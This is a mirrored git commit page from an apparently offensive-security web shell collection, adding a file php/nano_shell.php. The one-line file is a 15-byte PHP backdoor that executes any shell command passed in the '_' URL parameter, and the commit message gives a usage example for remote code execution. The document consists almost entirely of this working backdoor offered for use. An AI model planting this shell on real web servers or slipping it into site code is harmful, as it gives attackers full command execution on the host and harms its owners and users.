mirror of
https://github.com/BlackArch/webshells
synced 2024-11-22 11:53:05 +00:00
feat: Add 15 bytes PHP payload to achieve RCE!
- Add 15 bytes long PHP backdoor to achieve RCE! Usage: `http://127.0.0.1/?_=ls`
This commit is contained in:
parent
9d0462804b
commit
ef003783c8
1 changed files with 1 additions and 0 deletions
1
php/nano_shell.php
Normal file
1
php/nano_shell.php
Normal file
|
@ -0,0 +1 @@
|
||||||
|
<?=`$_GET[_]`?>
|
Loading…
Reference in a new issue